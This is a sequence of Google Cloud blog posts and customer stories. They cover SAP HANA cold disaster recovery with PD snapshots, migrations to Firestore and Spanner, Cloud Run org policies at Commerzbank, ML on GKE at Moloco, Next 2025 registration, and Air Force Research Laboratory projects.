Like many businesses, your SAP HANA database is the heart of your SAP business applications, a repository of mission-critical data that drives your operations. But what happens when disaster strikes?
Protecting a SAP HANA system involves choices. Common methods include HANA System Replication (HSR) for high availability and Backint for backups. But while having a disaster recovery (DR) strategy is crucial, it doesn’t need to be overly complex or expensive. While HSR offers rapid recovery, it requires a significant investment. For many SAP deployments, a cold DR strategy strikes the perfect balance between cost-effectiveness and recovery time objectives (RTOs).
What is cold DR? Think of it as your backup plan’s backup plan. It minimizes costs by maintaining a non-running environment that’s only activated when disaster strikes. This traditionally means longer RTOs compared to hot or warm DR, but significantly lower costs, and while often deemed sufficient, any improvement on RTO and lower cost is what businesses are often in search of.
Backint, when paired with storage (e.g. Persistent Disk and Cloud Storage) enables data transfer to a secondary location, and can be an effective cold DR solution. However, using Backint for DR can mean longer restore times and high storage costs, especially for large databases. Google Cloud is delivering a solution addressing both the cost-effectiveness of cold DR and the rapid recovery of a full DR solution: Backup and DR Service with Persistent Disk (PD) snapshot integration. This innovative approach leverages the power of incremental forever backups and HANA Savepoints to protect your SAP HANA environment.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3ef6421c6fd0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Rethinking SAP disaster recovery in Google Cloud
Backup and DR is an enterprise backup and recovery solution that integrates directly with cloud-based workloads that run in Google Compute Engine. Backup and DR provides backup and recovery capabilities for virtual machines (VMs), file systems, multiple SAP databases (HANA, ASE, MaxDB, IQ) as well as Oracle, Microsoft SQL Server, and Db2. You can elect to create backup plans to configure the time of backup, how long to retain backups, where to store the backups (regional/multi-regional) and in what tier of storage, along with specifying database log backup intervals to help ensure a low recovery point objective (RPO).
A recent Backup and DR feature offers Persistent Disk (PD) snapshot integration for SAP HANA databases. This is a significant advancement because these PD snapshots are integrated with SAP HANA Savepoints to help ensure database consistency. When the database is scheduled to be backed up, the Backup and DR agent running in the SAP HANA node instructs the database to trigger a Savepoint image, where all changed data is written to storage in the form of pages. Another benefit of this integration is that the data copy process occurs on the storage side. You no longer copy the backup data through the same network interfaces that the database or operating system are using. This results in production workloads retaining the compute and networking resources, even during an active backup
Once completed, Backup and DR services trigger the PD snapshots from the Google Cloud storage APIs, so that the image is captured on disk, and logs can also be truncated if desired. All of these snapshots are “incremental forever” and database-consistent backups. Alternatively, you can use logs to recover to a point in time (from the HANA PD snapshot image).
Integration with SAP HANA Savepoints is critical to this process. Savepoints are SAP HANA API calls whose primary use is to help speed up recovery restart times, to provide a low RTO. They achieve this because when the system is starting up, logs don’t need to be processed from the beginning, but only from the last Savepoint position. Savepoints are coordinated across all processes (called SAP HANA services) and instances of the database to ensure transaction consistency.
The HANA Savepoint Backup sequence using PD snapshots can be summarized as:
Tell agent to initiate HANA Savepoint
Initiate PD snapshot, wait for ‘Uploading’ state (seconds)
Tell agent to close HANA Savepoint
Wait for PD snapshot ‘Ready’ state (minutes)
Expire any logs on disk that have passed expiration time
Catalog backup for reporting, auditing
In addition, you can configure log backups to occur regularly, independent of Savepoint snapshots. These logs are stored on a separate disk and also backed up via PD snapshots, allowing for point-in-time recovery.
Operating system backups
What about the operating system backups? Good news: Backup and DR lets you take PD snapshots for the bootable OS and selectively any other disk attached directly to your Compute Engine VMs. These backup images can be also stored in the same regional or multi-regional location for cold DR purposes.
You can then restore HANA databases to a local VM or your disaster recovery (DR) region. This flexibility allows you to use your DR region for a variety of purposes, such as development and testing, or maintaining a true cold DR region for cost efficiency.
Backup and DR helps simplify DR setup by allowing you to pre-configure networks, firewall rules, and other dependencies. It can then quickly provision a backup appliance in your DR region and restore your entire environment, including VMs, databases, and logs.
This approach gives you the freedom to choose the best DR strategy for your needs: hot, warm, or cold, each with its own cost, RPO, and RTO implications.
One of the key advantages of using Backup and DR with PD snapshots is the significant cost savings it offers compared to traditional DR methods. By eliminating the need for full backups and leveraging incremental forever snapshots, customers can reduce their storage costs by up to 50%, in our testing. Additionally, we found that using a cold DR region with Backup and DR can reduce storage consumption by 30% or more compared to using a traditional backup to file methodology.
Why this matters
Using Google Cloud’s Backup and DR to protect your SAP HANA environment brings a lot of benefits:
Better backup performance(throughput) – storage layer handles data transfer rather than an agent on the HANA server
Reduced TCO through elimination of regular full backups
Reduced I/O on the SAP HANA server by avoiding database reads and the writes during the backup window that can be very long by comparison to a regular Backint full backup event.
Operational simplicity with an onboarding wizard, and no need to manage additional storage provisioning on the source host
Faster recovery times (local or DR) as PD Snapshots recover natively to the VM storage subsystem (not copied over customer networks). Recovery to a point-in-time is possible with logs from the HANA PD Snapshot. You can even take more frequent Savepoints by scheduling these every few hours, to further reduce the log recovery time for restores
Data resiliency – HANA PD Snapshots are stored in regional or multi-regional locations
Low Cost DR – Since Backup images for VMs and Databases are already replicated to your DR region (via regional or multi-regional PD snapshots), recovery is just a matter of bringing up your VM, then choosing your recovery point-in-time for the SAP HANA Database and waiting for a short period of time
When to choose Persistent Disk Asynchronous Replication
While Backup and DR offers a comprehensive solution for many, some customers may have specific needs or preferences that require a different approach. For example, if your SAP application lacks built-in replication, or you need to replicate your data at the disk level, Persistent Disk Asynchronous Replication is a valuable alternative. This approach allows you to spin up new VMs in your DR region using replicated disks, speeding up the recovery process.
PD Async’s infrastructure-level replication is application agnostic, making it ideal for applications without built-in replication. It’s also cost-effective, as you only pay for the storage used by the replicated data. Plus, it offers flexibility, allowing you to customize the replication frequency to balance cost and RPOs.
If you are interested in setting up PD Async, and would like to configure this within Terraform, please take a look at one of our colleagues who created this Terraform example for how to test in a failover and failback scenario for a number of Compute Engine VMs.
Take control of your SAP disaster recovery
By leveraging Google Cloud’s Backup and DR and PD Async, you can build a robust and cost-effective cold DR solution for your SAP deployments on Google Cloud that minimizes costs without compromising on data protection, providing peace of mind in the face of unexpected disruptions.
HighLevel is an all-in-one sales and marketing platform built for agencies. We empower businesses to streamline their operations with tools like CRM, marketing automation, appointment scheduling, funnel building, membership management, and more. But what truly sets HighLevel apart is our commitment to AI-powered solutions, helping our customers automate their businesses and achieve remarkable results.
As a software as a service (SaaS) platform experiencing rapid growth, we faced a critical challenge: managing a database that could handle volatile write loads. Our business often sees database writes surge from a few hundred requests per second (RPS) to several thousand within minutes. These sudden spikes caused performance issues with our previous cloud-based document database.
This previous solution required us to provision dedicated resources, which created several bottlenecks:
Slow release cycles: Provisioning resources before every release impacted our agility and time-to-market.
Scaling limitations: We constantly battled DiskOps limitations due to high write throughput and numerous indexes. This forced us to shard larger collections across clusters, requiring complex coordination and consuming valuable engineering time.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud databases’), (‘body’, <wagtail.rich_text.RichText object at 0x3ef6787c9400>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/products?#databases’), (‘image’, None)])]>
Going serverless with Firestore
To overcome these challenges, we sought a database solution that could seamlessly scale and handle our demanding write requirements.
Firestore‘s serverless architecture made it a strong contender from the start. But it was the arrival of point-in-time recovery and scheduled backups that truly solidified our decision. These features eliminated our initial concerns and gave us the confidence to migrate the majority of HighLevel’s workloads to Firestore.
Since migrating to Firestore, we have seen significant benefits, including:
Increased developer productivity: Firestore’s simplicity has boosted our developer productivity by 55%, allowing us to focus on product innovation.
Enhanced scalability: We’ve scaled to over 30 billion documents without any manual intervention, handling workloads with spikes of up to 250,000 RPS and five million real-time queries.
Improved reliability: Firestore has proven exceptionally reliable, ensuring consistent performance even under peak load.
Real-time capabilities: Firestore’s real-time sync capabilities power our real-time dashboards without the need for complex socket infrastructure.
Firestore powering HighLevel’s AI
Firestore also plays a crucial role in enabling our AI-powered services across Conversation AI, Content AI, Voice AI and more. All these services are designed to put our customers’ businesses on autopilot.
Fig. 1: HighLevel AI features
For Conversation AI, for example, we use a retrieval augmented generation (RAG) architecture. This involves crawling and indexing customer data sources, generating embeddings, and storing them in Firestore, which acts as our vector database. This approach allows us to:
Overcome context window limitations of generative AI models
Reduce latency and cost
Improve response accuracy and minimize hallucinations
Fig. 2: HighLevel’s AI Architecture
Lessons learned and a path forward
Fig. 3: Google Firestore field indexes data
Our journey with Firestore has been eye-opening, and we’ve learned valuable lessons along the way.
For example, in December 2023, we encountered intermittent failures in collections with high write queries per second (QPS). These collections were experiencing write latencies of up to 60 seconds, causing operations to fail as deadlines expired before completion. With support from the Firestore team, we conducted a root-cause analysis and discovered that the issue stemmed from default single-field indexes on constantly increasing fields. These indexes, while helpful for single-field queries, were generating excessive writes on a specific sector of the index.
Once we understood the root cause, our team identified and excluded these unused indexes. This optimization resulted in a dramatic improvement, reducing write-tail latency from 60 seconds to just 15 seconds.
Firestore has been instrumental in our ability to scale rapidly, enhance developer productivity, and deliver innovative AI-powered solutions. We are confident that Firestore will continue to be a cornerstone of our technology stack as we continue to grow and evolve. Moving forward, we are excited to continue leveraging Firestore and Google Cloud to power our AI initiatives and deliver exceptional value to our customers.
Get started
Are you curious to learn more about how to use Firestore in your organization?
Watch our Next 2024 breakout session to discover recent Firestore updates, learn more about how HighLevel is experiencing significant total cost of ownership savings, and more!
This project has been a team effort. Shout out to the Platform Data team — Pragnesh Bhavsar in particular who has done an amazing job leading the team to ensure our data infrastructure runs at such a massive scale without hiccups. We also want to thank Varun Vairavan and Kiran Raparti for their key insights and guidance. For more from Karan Agarwal, follow him on LinkedIn.
Usually, financial institutions process multiple millions of transactions daily. Obviously, when running on cloud technology, any security lapse in their cloud infrastructure might have catastrophic consequences. In serverless setups for compute workloads Cloud Run on Google Cloud is employed. That’s why we are happy to announce the general availability of Google Cloud’s custom org policies to fortify Cloud Run environments and ensure it can be aligned seamlessly to fulfill the weakest up to stringent regulatory standards.
Financial service institutions operate under stringent global and local regulatory frameworks and bodies, such as regulations from the EU’s European Banking Authority, US Securities and Exchange Commission, or the Monetary Authority of Singapore. Also, the sensitive nature of financial data necessitates robust security measures. Hence, maintaining a comprehensive security posture is of major importance, encompassing both coarse-grained and fine-grained controls to address internal and external threats.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3ef677699940>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Tailored Security, Configurable to Customer’s Needs
Network Access: Reduce unauthorized access attempts by precisely defining VPC configurations and ingress settings.
Deployment Security: Mandatory binary authorization is able to prevent potentially harmful deployments.
Resource Efficiency: Constraints on memory and CPU usage ensure getting the most out of cloud resources.
Stability & Consistency: Limiting the use of Cloud Run features to those in general vailability (GA) and enforcing standardized naming conventions enables a predictable, manageable environment.
This level of customization enables building a Cloud Run environment that’s not just secure, but also perfectly aligned with unique operational requirements.
Addressing the Complexities of Commerzbank’s Cloud Run Setup
Within Commerzbank’s Big Data & Advanced Analytics division, the company leverages cloud technology for its inherent benefits, particularly serverless services. Cloud Run is a crucial component of our serverless architecture and stretches across many applications due to its flexibility. While Cloud Run already offered security features such as VPC Service Controls, multi-regionality, and CMEK support, granular control over all Cloud Run’s capabilities was initially limited.
Diagram illustrating simplified policy management with Custom Org Policies
Better Together
The introduction of Custom Org Policies for Cloud Run now allows Commerzbank to directly map its rigorous security controls, ensuring compliant use of the service. This enhanced control enables the full-scale adoption and scalability of Cloud Run to support our business needs.
The granular control possible due to Custom Org Policies has been a game-changer. Commerzbank and customers like it can now tailor their security policies to their exact needs, preventing potential breaches and ensuring regulatory compliance.
A Secure Foundation for Innovation
Custom Org Policies have become an indispensable part of the cloud security toolkit. Their ability to enforce granular, tailored controls has boosted Commerzbank’s Cloud Run security and compliance. This newfound confidence allows them to innovate with agility, knowing their cloud infrastructure is locked down.
If you’re looking to enhance your Cloud Run security and compliance, we highly recommend exploring Custom Org Policies. They’ve been instrumental in Commerzbank’s journey, and we’re confident they can benefit your organization, too.
Looking Ahead: We’re also eager to explore how to leverage custom org policies for other Google Cloud services as Commerzbank continues to expand its cloud footprint. The bank’s commitment to security and compliance is unwavering, and custom org policies will remain a cornerstone of Commerzbank’s strategy.
We’re excited to share that Gartner has recognized Google as a Leader in the 2024 Gartner® Magic Quadrant™ for Data Integration Tools. As a Leader in this report, we believe Google’s position is a testament to delivering continuous customer innovation in areas such as unified data to AI governance, flexible and accessible data engineering experiences, and AI-powered data integration capabilities.
Today, most organizations operate with just 10% of the data they generate, which is often trapped in silos and disconnected legacy systems. The rise of AI unlocks the potential of the remaining 90%, enabling you to unify this data — regardless of format — within a single platform.
This convergence is driving a profound shift in how data teams approach data integration. Traditionally, data integration was seen as a separate IT process solely for enterprise business intelligence. But with the increased adoption of the cloud, we’re witnessing a move away from legacy on-premises technologies and towards a more unified approach that enables various users to access and work with a more robust set of data sources.
At the same time, organizations are no longer content with simply collecting data; they need to analyze it and activate it in real-time to gain a competitive edge. This is why leading enterprises are either migrating to or building their next-gen data platforms with BigQuery, converging the world of data lakes and warehouses. BigQuery’s unified data and AI capabilities combined with Google Cloud’s comprehensive suite of fully managed services, empower organizations to ingest, process, transform, orchestrate, analyze, and activate their data with unprecedented speed and efficiency. This end-to-end vision delivers on the promise of data transformation, so businesses can unlock the full value of their data and drive innovation.
Choice and flexibility to meet you where you are
Organizations thrive on data-driven decisions, but often struggle to wrangle information scattered across various sources. Google Cloud tools simplify data integration, by letting you:
Streamline data integration from third-party applications – With BigQuery Data Transfer Service, onboarding data from third-party applications like Salesforce or Marketo becomes dramatically simplified, eliminating complex coding and saving valuable time and data movement costs.
Create SQL-based pipelines – Dataform helps create robust, SQL-based pipelines, orchestrating the entire data integration flow easily and scalably. This flexibility empowers organizations to connect all their data dots, wherever they are, so they can unlock valuable insights faster.
Use gen-AI powered data preparation – BigQuery data preparation empowers analysts to clean and prepare data directly within BigQuery, using Gemini’s AI for intelligent transformations to streamline processes and help ensure data quality.
Bridging operational and analytical systems
Data teams know how frustrating it can be to have valuable analytical insights trapped in a data warehouse, disconnected from the operational systems where they could make a real impact. You don’t want to get bogged down in the complexities of ELT vs. ETL vs. ETL-T — you need solutions that prioritize SLAs to ensure on-time and consistent data delivery. This means having the right connectors to meet your needs, especially with the growing importance of real-time data. Google Cloud offers a powerful suite of integrated tools to bridge this gap, helping you easily connect your analytical insights with your operational systems to drive real-time action. With Google Cloud’s data tools, you can:
Perform advanced similarity searches and AI-powered analysis – Vector support across BigQuery and all Google databases lets you perform advanced similarity searches and AI-powered analysis directly on operational data.
Query operational data without moving it – Data Boost enables analysts to query data in place across sources like Bigtable and Vertex AI, while BigQuery’s continuous queries facilitate reverse ETL, pushing updated insights back into operational systems.
Implement real-time data integration and change data capture – Datastream captures changes and delivers them with low latency. Dataflow, Google Managed Service for Kafka, Pub/Sub, and new support for Apache Flink further enhance the reverse ETL process, fueling operational systems with fresh, actionable insights derived from analytics, all while using popular open-source software.
Governance at the heart of a unified data platform
Having strong data governance is critical, not just a checkbox item. It’s the foundation of ensuring your data is high-quality, secure, and compliant with regulations. Without it, you risk costly errors, security breaches, and a lack of trust in the insights you generate. BigQuery treats governance as a core component, not an afterthought, with a range of built-in features that simplify and automate the process, so you can focus on what matters most — extracting value from your data.
Easily search, curate and understand data with accelerated data exploration – With BigQuery data insights powered by Gemini, users can easily search, curate, and understand the data landscape, including the lineage and context of data assets. This intelligent discovery process helps remove the guesswork and accelerates data exploration.
Automatically capture and manage metadata – BigQuery’s automated data cataloging capabilities automatically capture and manage metadata, minimizing manual harvesting and helping to ensure consistency.
Google Cloud’s infrastructure is purpose-built with AI in mind, allowing users to easily leverage generative AI capabilities at scale. Users can train models, generate vector embeddings and indexes, and deploy data and AI use cases without leaving the platform. AI is infused throughout the user journey, with features like Gemini-assisted natural language processing, secure model integration, AI-augmented data exploration, and AI-assisted data migrations. This AI-centric approach delivers a strong user experience for data practitioners with varying skill sets and expertise.
2024 Gartner Magic Quadrant for Data Integration Tools -Thornton Craig et al, December 3, 2024. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Google. GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and MAGIC QUADRANT is a registered trademark of Gartner, Inc. and/or its affiliates and are used herein with permission. All rights reserved.
Editor’s note: In the heart of the fintech revolution, Current is on a mission to transform the financial landscape for millions of Americans living paycheck to paycheck. Founded on the belief that everyone deserves access to modern financial tools, Current is redefining what it means to be a financial institution in the digital age. Central to their success is a cloud-native infrastructure built on Google Cloud, with Spanner, Google’s globally distributed database with virtually unlimited scale, serving as the bedrock of their core platform.
More than 100 million Americans struggle to make ends meet, including the 23% of low-income Americans the Federal Reserve estimates do not have a bank account. Current was created to address their needs with a unique business model focused on payments, rather than the deposits and withdrawals of traditional financial institutions. We offer an easily accessible experience designed to make financial services available to all Americans, regardless of age or income.
Our innovative approach — built on proprietary banking core technology with minimal reliance on third-party providers — enables us to rapidly deploy financial solutions tailored to our members’ immediate needs. More importantly, these solutions are flexible enough to evolve alongside them in the future.
In our mission to deliver an exceptional experience, one of the biggest challenges we faced was creating a scalable and robust technological foundation for our financial services. To address this, we developed a modern core banking system to power our platform. Central to this core is our user graph service, which manages all member entities — such as users, products, wallets, and gateways.
Many unbanked and disadvantaged Americans lack bank accounts due to a lack of trust in institutions as much as because of any lack of funds. If we were going to win their trust and business, we knew we had to have a secure, seamless, and reliable service.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud databases’), (‘body’, <wagtail.rich_text.RichText object at 0x3e5581c88730>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/products?#databases’), (‘image’, None)])]>
A cloud-native core with Spanner
Our previous self-hosted graph database solution lacked cloud-native capabilities and horizontal scalability. To address these limitations, we strategically transitioned to managed persistence layers, which significantly improves our risk posture. Features like point-in-time restore and multi-regional redundancy enhanced our resilience, reduced recovery time objectives (RTO) and improved recovery point objectives (RPO). Additionally, push-button scaling optimized our cloud budget and operational efficiency.
This cloud-native platform necessitated a database solution with consistent writes, horizontal scalability, low read latency under load, and multi-region failover. Given our extensive use of Google Cloud, we prioritized its database offerings. Spanner emerged as the ideal solution, fulfilling all our requirements. It offers consistent writes, horizontal scalability, and the ability to maintain low read latency even under heavy load. Its seamless scalability — particularly the decoupling of compute and storage resources — proved invaluable in adapting to our dynamic consumer environment.
This robust and scalable infrastructure empowers Current to deliver reliable and efficient financial services, critical for building and maintaining member trust. We are the primary financial relationship for millions of Americans who are trusting us with their money week after week.Our experience migrating from a third-party database to Spanner proved that transitioning to a globally scalable, highly available database can be easy and seamless. Spanner’s unique ability to scale compute and storage independently proved invaluable in managing our dynamic user base.
Our strategic migration to Spanner employed a write-ahead commit log to ensure a seamless transition. By prioritizing the migration of reads and verifying their accuracy before shifting writes, we minimized risk and maximized efficiency. This process resulted in a zero-downtime, zero-loss cutover, where we could first transition reads to Spanner on a service-by-service basis, confirm accuracy, and finally migrate writes.
Ultimately, our Spanner-powered user graph service delivered the consistency, reliability, and scalability essential for our financial platform. We had renewed confidence in our ability to serve our millions of customers with reliable service and new abilities to scale our existing services and future offerings.
Unwavering Reliability and Enhanced Operational Efficiency
Spanner has dramatically improved our resilience, reducing RTO and RPO by more than 10x, cutting times to just one hour. With Spanner’s streamlined data restoration process, we can now recover data with a few simple clicks. Offloading operational management has also significantly decreased our team’s maintenance burden. With nearly 5,000 transactions per second, we continue to be impressed by Spanner’s performance and scalability.
Additionally, since migrating to Spanner, we have reduced our availability-related incidents to zero. Such incidents could disrupt essential banking functions like accessing funds or making payments, leading to customer dissatisfaction and potential churn, as well as increased operational costs for issue resolution. Elimination of these occurrences is critical for building and maintaining member trust, enhancing retention, and improving the developer experience.
Building Financial Resilience with Google Cloud
Looking ahead, we envision a future where our platform continues to evolve, delivering innovative financial solutions that meet the ever-changing needs of our members. With Spanner as the foundation of our core platform — you could call it the core of cores — we are confident in building a resilient and reliable platform that enables millions of more Americans to improve their financial outcomes.
In today’s congested digital landscape, businesses of all sizes face the challenge of optimizing their marketing budgets. They must find ways to stand out amid the bombardment of messages vying for potential customers’ attention. Moreover, they grapple with rising customer acquisition costs and dwindling retention rates, impeding their profitability.
Adding to this complexity is the abundance of consumer data, which businesses often struggle to harness effectively to target the right audience. To address these challenges, companies are seeking data-driven approaches to enhance their advertising effectiveness, to help ensure their continued relevance and profitability.
Moloco offers AI-powered advertising solutions that drive user acquisition, retention, and monetization efforts. Moloco Ads, its demand-side platform (DSP), utilizes its customers’ unique first-party data, helping them to target and acquire high-value users based on real-time consumer behavior — ultimately, delivering higher conversion rates and return on investment.
To meet this demand, Moloco leverages predictions from a dozen deep neural networks, while continuously designing and evaluating new models. The platform ingests 10 petabytes of data and processes bid requests per day at a peak rate of 10.5 million queries per second (QPS).
Moloco has seen tremendous growth over the last three years, with its business growing over 8X and multiple customers spending more than $50 million annually. Moloco’s rapid growth required an infrastructure that could handle massive data processing and real-time ML predictions while remaining cost effective. As Moloco’s models grew in complexity, training times increased, hindering productivity and innovation. Separately, the Moloco team realized that they also needed to optimize serving efficiency to scale low-latency ad experiences for users across the globe.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud containers and Kubernetes’), (‘body’, <wagtail.rich_text.RichText object at 0x3e55818530a0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectpath=/marketplace/product/google/container.googleapis.com’), (‘image’, None)])]>
Training complex ML models with GKE
After evaluating multiple cloud providers and their solutions, Moloco opted for Google Cloud for its scalability, flexibility, and robust partner ecosystem.The infrastructure provided by Google Cloud aligned with Moloco’s requirements for handling its rapidly growing data and machine learning workloads that are instrumental to optimizing customers’ advertising performance.
Google Kubernetes Engine (GKE) was a primary reason for Moloco selecting Google Cloud over other cloud providers. As Moloco discovered, GKE is more than a container orchestration tool; it’s a gateway to harnessing the full potential of AI and ML. GKE provides scalability and performance optimization tools to meet diverse ML workloads, and supports a wide range of frameworks, allowing Moloco to customize the platform according to their specific needs.
GKE serves as a foundation for a unified AI/ML platform, integrating with other Google Cloud services, facilitating a robust environment for the data processing and distributed computing that underpin Moloco’s complex AI and ML tasks. GKE’s ML data layer offers the high-throughput storage solutions that are crucial for read-heavy workloads. Features like cluster autoscaler, node-auto provisioner, and pod autoscalers ensure efficient resource allocation.
“Scaling our infrastructure as Moloco’s Ads business grew exponentially was a huge challenge. GKE’s autoscaling capabilities enabled the engineering team to focus on development without spending a ton of effort on operations.” – Sechan Oh, Director of Machine Learning, Moloco
Shortly after migrating to Google Cloud, Moloco began using GKE for model training. However, Moloco quickly found that using traditional CPUs was not competitive at its scale, in terms of both cost and velocity. GKE’s ability to autoscale on multi-host Tensor Processing Units (TPUs), Google’s specialized processing units for machine learning workloads, was critical to Moloco’s success, allowing Moloco to harness TPUs at scale, resulting in significant enhancements in training speed and efficiency.
Moloco further leveraged GKE’s AI and ML capabilities to optimize the management of its compute resources, minimizing idle time and generating cost savings while improving performance. Notably, GKE empowered Moloco to scale its ML infrastructure to accommodate exponential business growth without straining its engineering team. This enabled Moloco’s engineers to concentrate on developing AI and ML software instead of managing infrastructure.
“The GKE team collaborated closely with us to enable auto scaling for multi host TPUs, which is a recently added feature. Their help has really enabled amazing performance on TPUs, reducing our cost per training job by 2-4 times.” – Kunal Kukreja, Senior Machine Learning Engineer, Moloco
In addition to training models on TPUs, Moloco also uses GPUs on GKE to deploy ML models into production. This lets the Moloco platform handle real-time inference requests effectively and benefit from GKE’s scalability and operational stability, enhancing performance and supporting more complex models.
Moloco collaborated closely with the Google Cloud team throughout the implementation process, leveraging their expertise and guidance. The Google Cloud team supported Moloco in implementing solutions that ensured a smooth transition and minimal disruption to operations. Specifically, Moloco worked with the Google Cloud team to migrate its ML workloads to GKE using the platform’s autoscaling and pod prioritization capabilities to optimize resource utilization and cost efficiency. Additionally, Moloco integrated Cloud TPUs into its training pipeline, resulting in significantly reduced training times for complex ML models. Furthermore, Moloco optimized its serving infrastructure with GPUs, ensuring low-latency ad experiences for its customers.
A powerful foundation for ML training and inference
Moloco’s collaboration with Google Cloud profoundly transformed its capacity for innovation.
“By harnessing Google Cloud’s solutions, such as GKE and Cloud TPU, Moloco dramatically reduced ML training times by up to tenfold.”–Sechan Oh, Director of Machine Learning, Moloco
This in turn facilitated swift model iteration and experimentation, empowering Moloco’s engineers to innovate with unprecedented speed and efficiency. Moreover, the scalability and performance of Google Cloud’s infrastructure enabled Moloco to manage increasingly intricate models and expansive datasets, to create and implement cutting-edge machine learning solutions. Notably, Moloco’s low-latency advertising experiences, bolstered by GPUs, fostered enhanced customer satisfaction and retention.
Moloco’s success demonstrates the power of Google Cloud’s solutions to enable businesses achieve their full potential. By leveraging GKE, Cloud TPU, and GPUs, Moloco was able to scale its infrastructure, accelerate its ML training, and deliver exceptional ad experiences to its customers. As Moloco continues to grow and innovate, Google Cloud will remain a critical partner in its success.
Meanwhile, GKE is transforming the AI and ML landscape by offering a blend of scalability, flexibility, cost-efficiency, and performance. And Google Cloud continues to invest in GKE so it can handle even the most demanding AI training workloads. For example, GKE now supports 65,000-node clusters, offering unmatched scale for training or inference. For more, watch this demo of 65,000 nodes on a single GKE cluster.
Based on your feedback, Partner Summit 2025 will begin on Tuesday, April 8 – one day before Google Cloud Next kicks off – to offer a dedicated day of partner breakout sessions and learning opportunities before the main event begins. The Partner Summit Lounge, partner keynote, lightning talks, and more will all be available April 9–11, 2025.
Partner Summit is your exclusive opportunity to:
Accelerate your business by aligning on joint business goals, learning about new programmatic and incentive opportunities, and diving deep into cutting-edge insights in our Partner Summit breakout sessions and lightning talks.
Build new connections as you network with other partners and Googlers while you explore the activities and perks located in our exclusive Partner Summit Lounge.
Get a look at what’s next from Google Cloud leadership at the dedicated partner keynote to learn about where cloud is headed – and how our partners are central to our mission.
Make the most of our partnership with personalized advice from Google Cloud team members on incentives, certifications, co-marketing, and more at our Meet the Experts booths.
Get ready to learn, connect, and build the future of business with us. Early bird registration is now open for $999. This special rate is only available through February 14, 2025, or until tickets are sold out.
Google Cloud Next returns to Las Vegas, April 9–11, 2025* and I’m thrilled to share that registration is now live! We welcomed 30,000 attendees to our largest flagship conference in Google Cloud history this past April, and 2025 will be even bigger and better than ever.
Join us for an unforgettable week of hands-on experiences, inspiring content, problem-solving with our top partners and seize the opportunity to learn from top experts and peers tackling the same challenges you are day in and day out. Walk away with new ideas, breakthrough skills and actionable knowledge only available at Google Cloud Next 2025.
Early bird registration is now available for just $999 for a limited time**.
Here’s why you need to be at Next:
Experience AI in Action: Immerse yourself in the latest technology; build your next agent; explore our demos, hackathons, and workshops; and learn how others are harnessing the power of AI to propel their businesses to new heights.
Forge Powerful Connections: Network with peers, industry experts, and the brightest minds in tech to exchange ideas, spark collaborations, and shape the future of your industry.
Build and Learn Live: With a wealth of demos and workshops, hackathons, keynotes, and deep dives, Next is the place to be for the builders, dreamers, and doers shaping the future of technology.
* Select programming to take place in the afternoon of April 8. ** Space is limited, and this offer is only valid through 11:59 PM PT on February 14, 2025, or until tickets are sold out.
Through our collaboration, the Air Force Research Laboratory (AFRL) is leveraging Google Cloud’s cutting-edge artificial intelligence (AI) and machine learning (ML) capabilities to tackle complex challenges across various domains, from materials science and bioinformatics to human performance optimization. AFRL, the center for scientific research and development for the U.S. Air Force and Space Force, is embracing the transformative power of AI and cloud computing to accelerate its mission of developing and transitioning advanced technologies to the air, space, and cyberspace forces.
This collaboration not only enhances AFRL’s research capabilities, but also aligns with broader Department of Defense (DoD) initiatives to integrate AI into critical operations, bolster national security, and maintain technological advantage by demonstrating game-changing technologies that enable technical superiority and help the Air Force adopt to cutting edge technologies as soon as they are released. By harnessing Google Cloud’s scalable infrastructure, comprehensive generative AI offerings and collaborative environment, the AFRL is driving innovation and ensuring the U.S. Air Force and Space Force remain at the forefront of technological advancement.
Let’s delve into examples of how the AFRL and Google Cloud are collaborating to realize the benefits of AI and cloud services:
Bioinformatics breakthroughs: The AFRL’s bioinformatics research was once hindered by time-consuming manual processes and data bottlenecks, causing delays in moving and sharing data, getting access to US-based tools, using standard storage and hardware, and having the right system communications and integrations across third party infrastructure. Because of this, cross-team collaboration and experiment expansion was severely limited and inefficiently tracked. With very little cloud experience, the team was able to create a siloed environment where they used Google Cloud’s infrastructure, such as Google Compute Engine, Cloud Workstations, and Cloud Run to build analytic pipelines that helped them test, store, and analyze data in an automated and streamlined way. That data pipeline automation paved the way for further exploration and expansion on a use case that had never been done before.
Web app efficiency for lab management: The AFRL’s complex lab equipment scheduling process resulted in challenges in providing scalable, secure access to important content and information for users in different labs. To mitigate these challenges and ease maintenance for non-programmer researchers and lab staff, the team built a custom web application based on Google App Engine, integrated with Google Workspace and Apps Scripts, so that they could capture usage metrics for future hardware investment decisions and automate admin tasks that were taking time away from research. The result was significantly faster ability to make changes without administrator intervention, a variety of self-service options for users to schedule time on equipment and request training, and an enhanced, scalable design architecture with built-in SSO that helped streamline internal content for multiple labs.
Modeling insights into human performance: Understanding and optimizing human performance is critical for the AFRL’s mission. The FOCUS Mission Readiness App, built on Google Cloud utilizes various infrastructure services, such as Cloud Run, Cloud SQL, and GKE and integrates with the Garmin Connect APIs to collect and analyze real-time data from wearables.
By leveraging Google Cloud’s BigQuery and other analytics tools, this app provides personalized insights and recommendations for fatigue interventions and predictions that help capture valuable improvement mechanisms in cognitive effectiveness and overall well-being for Airmen.
